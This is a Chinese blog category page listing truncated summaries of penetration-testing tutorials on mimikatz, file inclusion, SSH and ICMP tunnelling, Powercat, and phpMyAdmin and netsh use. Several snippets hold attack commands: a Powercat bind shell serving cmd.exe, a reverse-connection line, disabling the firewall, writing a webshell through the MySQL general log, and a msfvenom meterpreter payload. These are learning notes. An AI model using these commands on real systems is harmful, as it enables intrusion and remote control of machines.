渗透测试 - 随笔分类(第3页) - lnterpreter

文件包含

摘要：一、漏洞产生的函数 include() include_once() //检查是否已经包含，如果包含，就不再执行包含 require() require_once() include与require最大的区别在于，如果包含的文件存在错误；那么include弹出警告，脚本继续执行。而require会终阅读全文

posted @ 2020-12-23 11:56 lnterpreter 阅读(90) 评论(0) 推荐(0)

编码

摘要：一、url编码 1、url编码多以%为前缀，其后是这个字符的两位16进制的ASCll代码 2、常见url编码字符： %25 代表 % %00 代表空字节 %20 代表空格（+ 也可以表示空格）二、Unicode编码 16位Unicode转换：如果在HTTP中传输，需要设置以%u开头，然后对应A 阅读全文

posted @ 2020-12-17 16:26 lnterpreter 阅读(337) 评论(0) 推荐(0)

mimikatz

摘要：一、加载mimikatz load mimikatz 二、获取hash 三、获取明文密码四、获取当前用户阅读全文

posted @ 2020-12-04 19:15 lnterpreter 阅读(84) 评论(0) 推荐(0)

session包含

摘要：一、配置 session.save_path //session文件存储地址 session.upload_progress.enabled //session文件上传上传 session.upload_progress.cleanup //定时清空文件二、写入session一句话 <?php f 阅读全文

posted @ 2020-12-04 15:40 lnterpreter 阅读(1573) 评论(0) 推荐(0)

smb

摘要：一、版本 SMB(全称是Server Message Block)是一个协议名，它能被用于客户端与服务器之间的信息沟通。 SMB1- Windows 2000，XP and Windows 2003 SMB2 - Windows Vista sP1 and Windows 2008 SMB2.1 - 阅读全文

posted @ 2020-11-26 17:25 lnterpreter 阅读(336) 评论(0) 推荐(0)

Linux远程认证安全

摘要：一、实验环境配置 1、SSH服务安装 sudo apt install openssh-server 2、启动服务端 sudo service ssh start 3、重新启动服务端 sudo service ssh restart 二、连接服务器（默认22端口） 1、ssh -p 端口号用户名@ 阅读全文

posted @ 2020-11-25 12:19 lnterpreter 阅读(123) 评论(0) 推荐(0)

phpmyadmin拿shell

摘要：一、查看绝对路径 select @@basedir; 二、日志文件写一句话 1、查看是否开启日志 show variables like '%general%'; 2、设置日志状态 show variables like 'general_log'; // 查看日志是否开启 set global g 阅读全文

posted @ 2020-11-24 18:55 lnterpreter 阅读(217) 评论(0) 推荐(0)

SSH隧道

摘要：一、本地端口转发(跳板机有外网和内网地址) 1、跳板机配置 vim /etc/ssh/sshd_config //SSH配置文件 AllowAgentForwarding yes //是否允许转发TCP协议 GatewayPorts yes //是否允许远程主机连接本地转发端口 PermitRoot 阅读全文

posted @ 2020-11-22 15:35 lnterpreter 阅读(92) 评论(0) 推荐(0)

Powercat

摘要：一、正向连接 //windows7下执行（受害机） Powercat -l -p 8080 -e cmd.exe -v //kali下执行（攻击机） nc 192.168.227.161 8080 -vv 二、反向连接 //windows7下执行（受害机） Powercat -c 192.168.2 阅读全文

posted @ 2020-11-22 14:47 lnterpreter 阅读(100) 评论(0) 推荐(0)

网络层隧道

摘要：一、网络层隧道 IPv6隧道 ICM隧道 ICMP隧道工具有PingTunnel，icmptunnel,icmpsh,powershell,icmp等常见ICMP隧道就是Ping命令攻击机A: git clone https://github.com/inquisb/icmpsh.git //下阅读全文

posted @ 2020-11-22 10:59 lnterpreter 阅读(319) 评论(0) 推荐(0)

内网连通性判断

摘要：一、隐藏通信隧道技术 1、网络层隧道 IPv6隧道 ICMP隧道 2、传输层隧道 TCP UDP 3、应用层隧道 SSH HTTP DNS 二、内网连通性判断 1、ICMP协议 ping IP 2、TCP协议 nc ip port 3、HTTP协议 curl ip:port 4、DNS协议 nslo 阅读全文

posted @ 2020-11-21 23:12 lnterpreter 阅读(420) 评论(0) 推荐(0)

框架信息搜集

摘要：一、请求头搜集 1、index.action 2、利用搜索引擎搜索，判断框架Struts 3、GitHub搜索工具 4、利用工具测试是否存在漏洞，拿shell 二、报错信息搜集 1、容器信息搜集，Powered by Jetty:// 阅读全文

posted @ 2020-11-17 16:03 lnterpreter 阅读(152) 评论(0) 推荐(0)

主机信息搜集

摘要：一、主机存活扫描 use auxiliary/scanner/discovery/arp_sweep set rhosts 192.168.158.1/24 set threads 200 set shost xxx//冒充ip set smac xxx//冒充mac 二、端口扫描 use auxi 阅读全文

posted @ 2020-11-16 19:38 lnterpreter 阅读(99) 评论(0) 推荐(0)

netsh

摘要：一、2003以后命令介绍（以08为例） 1、查看所有类型的防火墙状态 netsh advfirewall show allprofiles 2、关闭防火墙 netsh advfirewall set allprofiles state off 3、开启防火墙 netsh advfirewall se 阅读全文

posted @ 2020-11-10 16:40 lnterpreter 阅读(402) 评论(0) 推荐(0)

基本流程

摘要：一、查看robots.txt文件看看是否有敏感信息二、扫目录,一个备份文件和后台三、从备份文件中找到后台帐号密码,登陆四、找到上传点,上传一句话木马五、蚁剑连接,查看当前权限六、收集信息七、根据补丁号,找提权exp 八、MSF生成木马 msfvenom -p windows/meterp 阅读全文

posted @ 2020-11-03 12:11 lnterpreter 阅读(150) 评论(0) 推荐(0)

lnterpreter

随笔分类 - 渗透测试

公告